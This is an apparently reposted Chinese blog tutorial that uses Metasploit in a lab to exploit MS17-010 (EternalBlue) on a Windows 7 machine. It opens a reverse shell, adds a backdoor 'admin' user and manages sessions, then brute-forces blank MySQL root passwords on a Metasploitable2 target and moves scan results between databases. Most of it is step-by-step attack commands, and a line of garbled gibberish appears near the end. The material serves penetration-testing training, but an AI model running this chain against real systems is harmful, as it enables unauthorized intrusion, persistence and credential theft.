网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]

欢迎各位彦祖与热巴畅游本人专栏与博客 你的三连是我最大的动力 以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现] 专栏跑道一 ➡️网络空间安全——全栈前沿技术持续深入学习  专栏跑道二 ➡️ 24 Network Security -

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 


专栏跑道二


➡️ 24 Network Security -LJS 

​ 

专栏跑道三


 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五


➡️RHCE-LJS[Linux高端骚操作实战篇]​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]


上节回顾

目录

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

1.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令

1.2通过 msf 模块获取 Win7 主机远程 shell

模块的整体使用流程如下

我们先扫描目标是否存在 ms17-010 漏洞

使用 use 命令选中这个模块

查看模块需要配置的信息

配置 RHOST 主机 IP

开始扫描

查找攻击模块

使用 use 命令加载模块

设置目标主机 IP

查看 exploit target 目标类型:

找一个 payload,获取 shell 远程连接权限后,进行远程执行命令

补充:

我们挑选一个反弹 shell 的 payloads

注意:

查看一下 payloads 需要配置什么信息

设置一下本机 payload 监听地址

配置完成后开始执行

注意:

使用 DOS 命令创建用户

显示乱码原因以及如何解决

解决方案:

查看用户

查看拿到的用户权限

关闭连接

实战2:通过会话进行连接目标机

补充:

通过会话 Id 进入会话

  退出会话将会话保存到后台

根据会话 Id 结束会话

实战3:使用 msf 扫描靶机上 mysql 服务的空密码

启动一台 Metasploitable2-Linux 靶机网络模式为桥接 IP:192.168.1.180

登录 Metasploitable2-Linux 系统用户名 root,密码:123456

输入 ip a 查看 ip 地址

登录 Kali 开始搜索模块

加载模块

查看模块配置项

配置要爆破的用户

参数详解:

开启为所有用户尝试空密码

设置目标主机

配置完成以后我们执行 run 或者 exploit

使用后端凭证命令 creds , 列出数据库中的所有凭据

将扫描的结果导出 Metasploit 与导入另一台机器的 Metasploit 中

示例1:将前面扫描 mysql 数据库空密码信息导出

注意:

导出以后退出程序

示例2:将扫描的结果导入另一台机器的 Metasploit 中

连接 Metasploit

数据库中主机信息是空的,我们导入数据

通过 hosts -h 可以查看多个选项详解

比如:显示指定列的主机信息

删除指定主机

回到 Metasploit 导入扫描结果

查看数据库中的主机都开放了哪些服务

显示指定主机的服务信息


1.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令

1.2通过 msf 模块获取 Win7 主机远程 shell

  • Win7 旗舰版 SP1-64 位系统镜像(内有激活工具):
  • 链接:
  • 提取码:root

  • Win7 旗舰版 SP1-64 位免安装版(已激活)密码:123456,下载解压后用 VMware 直接打开即可
  • 链接:
  • 提取码:0khh
  • 如果想自己安装可以下载镜像,不想自己安装的可以下载免安装版


模块的整体使用流程如下

我们先扫描目标是否存在 ms17-010 漏洞

msf5 > search ms17-010

使用 use 命令选中这个模块

msf5 > use auxiliary/scanner/smb/smb_ms17_010

查看模块需要配置的信息

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

配置 RHOST 主机 IP

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.56

开始扫描

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

  • 目标看起来易受攻击,也就表示可能存在相关漏洞。

查找攻击模块

msf5 > search ms17-010

使用 use 命令加载模块

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

设置目标主机 IP

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.56

查看 exploit target 目标类型:

msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

  • 可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。
  • 所以已经配置好漏洞相关参数了,接下来应该做什么呢?
  • 还记得之前发的红队渗透路线图么:

找一个 payload,获取 shell 远程连接权限后,进行远程执行命令

msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell
type:payload
补充:

  • payload 又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回 shell,也可以进行程序注入等。

我们挑选一个反弹 shell 的 payloads

注意:
  • 设置的时候 payload 和 windows 之间有空格。
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/shell/reverse_tcp

查看一下 payloads 需要配置什么信息

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options #查看加载到的payload信息

设置一下本机 payload 监听地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.53

配置完成后开始执行

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

注意:
  • 如果等待没有出现 shell 提示符可以敲一下回车。
  • 直接执行的话会获得目标主机的 SEHLL

使用 DOS 命令创建用户

C:\Windows\system32>net user admin admin /add

显示乱码原因以及如何解决
  • 因为 windows 和 linux 的编码不一样导致的
  • 解决方案:
    C:\Windows\system32>chcp 65001

查看用户

C:\Windows\system32>net user

  • 可以看到新建的用户已经创建成功。

查看拿到的用户权限

C:\Windows\system32>whoami

关闭连接

msf5 exploit(windows/smb/ms17_010_eternalblue) >Ctrl+c
Abort session 1? [y/N] y


 

实战2:通过会话进行连接目标机

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

补充:
 

  • -j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

通过会话 Id 进入会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4

​​​​​​​

  退出会话将会话保存到后台

C:\Windows\system32>background

 

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

根据会话 Id 结束会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 4


实战3:使用 msf 扫描靶机上 mysql 服务的空密码

  • 启动一台 Metasploitable2-Linux 靶机网络模式为桥接 IP:192.168.1.180

登录 Metasploitable2-Linux 系统用户名 root,密码:123456

输入 ip a 查看 ip 地址

登录 Kali 开始搜索模块

msf5 > search mysql_login

加载模块

msf5 > use auxiliary/scanner/mysql/mysql_login

查看模块配置项

msf5 auxiliary(scanner/mysql/mysql_login) > show options

配置要爆破的用户

msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root

参数详解:
  • BLANK_PASSWORDS 含意:Try blank passwords for all users #为所有用户尝试空密码 。

开启为所有用户尝试空密码

msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true

设置目标主机

msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180

配置完成以后我们执行 run 或者 exploit

msf5 auxiliary(scanner/mysql/mysql_login) > exploit

  • 成功执行

使用后端凭证命令 creds , 列出数据库中的所有凭据

msf5 auxiliary(scanner/mysql/mysql_login) > creds


将扫描的结果导出 Metasploit 与导入另一台机器的 Metasploit 中

示例1:将前面扫描 mysql 数据库空密码信息导出

msf5 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml
注意:
  • 导出只支持两种格式:xml 和 pwdump
  • 常用的导出格式为 xml

导出以后退出程序

msf5 auxiliary(scanner/mysql/mysql_login) > exit

示例2:将扫描的结果导入另一台机器的 Metasploit 中
 

  • 所以不再开一台新 Kali,直接重置数据库,当成新的来用
    root@xuegod53:~# msfdb reinit

连接 Metasploit

root@xuegod53:~# msfconsole

msf5 > hosts

数据库中主机信息是空的,我们导入数据

msf5 > db_import /root/bak.xml

msf5 > hosts


Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.54 device
192.168.1.180 Unknown device

通过 hosts -h 可以查看多个选项详解

msf5 > hosts -h

  • 这里,最重要的是选项 -c,此选项使我们能够选择要用 hosts 命令显示的数据的列或字段(类似于 SQL 中的 select 命令)。

  • 在上图中可以看到显示的可用列。

比如:显示指定列的主机信息

msf5 > hosts -c address,name,os_name

删除指定主机

msf5 > hosts -d 101.200.128.35

  • 之外我们还可以直接将 NMAP 的扫描结果导入到 Metasploit 数据库中我们新开一个终端窗口来进行扫描。
  • 参数详解:
  • -oX 将扫描信息导出到 XML 文件中
     
root@xuegod53:~# nmap -A xuegod -oX xuegod.xml

回到 Metasploit 导入扫描结果

msf5 > db_import /root/xuegod.xml

msf5 > hosts

查看数据库中的主机都开放了哪些服务

msf5 > services

显示指定主机的服务信息

msf5 > services -R 192.168.1.180


给俄奥烦人饿vd siao vdashuvia 

vds avudsa 

v dhauvodsla vgdusa  vgudisaol 

发布者:admin,转转请注明出处:http://www.yc00.com/web/1754520712a5171613.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信